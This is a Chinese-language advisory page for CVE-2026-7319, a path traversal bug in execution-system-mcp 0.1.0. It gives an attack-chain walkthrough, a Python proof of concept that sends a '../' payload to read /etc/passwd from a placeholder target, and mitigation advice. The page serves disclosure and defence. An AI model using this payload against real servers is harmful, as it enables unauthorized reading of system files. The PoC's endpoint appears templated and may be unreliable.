CVE-2026-7319 CVSS 7.3 高危

CVE-2026-7319 execution-system-mcp路径遍历漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7319

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

elinsky execution-system-mcp

漏洞概述

该漏洞存在于 elinsky execution-system-mcp 0.1.0 版本的 `add_action` 工具中。由于 `_get_context_file_path` 函数未对用户提供的 `context` 参数进行严格的输入验证，攻击者可以通过操纵该参数发起路径遍历攻击。该漏洞可被远程利用，无需用户交互或认证，成功利用可能导致敏感文件泄露，对系统安全构成威胁。

技术细节

漏洞源于 `src/execution_system_mcp/server.py` 文件中 `_get_context_file_path` 函数的编码缺陷。该函数直接使用未经过滤的 `context` 参数构建文件路径，未使用 `os.path.abspath` 或 `os.path.realpath` 等函数进行路径规范化，也未检查结果路径是否仍在预期的根目录内。攻击者可以通过发送包含 `../` 序列的恶意 payload，遍历文件系统目录结构。由于组件涉及执行系统，攻击者可能读取配置文件、源代码或其他敏感数据。CVSS 3.1 评分为 7.3，表明其具有较高的利用价值和潜在风险。

攻击链分析

STEP 1

侦察

攻击者扫描互联网以识别运行 elinsky execution-system-mcp 0.1.0 的目标服务器。

STEP 2

武器化

攻击者构造包含路径遍历序列（如 "../"）的恶意 JSON payload，目标指向敏感文件（如 /etc/passwd）。

STEP 3

传递

攻击者无需认证，直接向受影响组件的 API 端点发送包含恶意 payload 的 POST 请求。

STEP 4

利用

服务器端 `_get_context_file_path` 函数处理 payload，由于缺乏过滤，将路径解析至预期目录之外。

STEP 5

达成

服务器读取并返回攻击者指定的敏感文件内容，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Path Traversal in elinsky execution-system-mcp
# Date: 2026-04-28
# Exploit Author: Analyst
# Vendor Homepage: https://github.com/elinsky/execution-system-mcp/
# Software Link: https://github.com/elinsky/execution-system-mcp/
# Version: 0.1.0

url = "http://target-ip:port/api/tools/add_action"
# Payload to read /etc/passwd using path traversal
payload = {
    "context": "../../../../../../etc/passwd",
    "action": "read" 
}

try:
    response = requests.post(url, json=payload)
    if response.status_code == 200:
        print("[+] Exploit successful!")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Exploit failed or patched.")
except Exception as e:
    print(f"Error: {e}")

影响范围

elinsky execution-system-mcp 0.1.0

防御指南

临时缓解措施

建议立即更新 elinsky execution-system-mcp 至修复了该路径遍历漏洞的版本。若无法立即更新，应在应用网关或代码层面对 `context` 参数实施严格的白名单校验，强制路径解析后必须位于允许的基础目录内，并禁止包含 `../` 的输入。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7319
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7319
3 Details https://www.cvedetails.com/cve/CVE-2026-7319/
4 VulDB https://vuldb.com/cve/CVE-2026-7319
5 Link https://github.com/elinsky/execution-system-mcp/
6 Link https://github.com/elinsky/execution-system-mcp/issues/1
7 Link https://vuldb.com/submit/803085
8 Link https://vuldb.com/vuln/359972
9 Link https://vuldb.com/vuln/359972/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表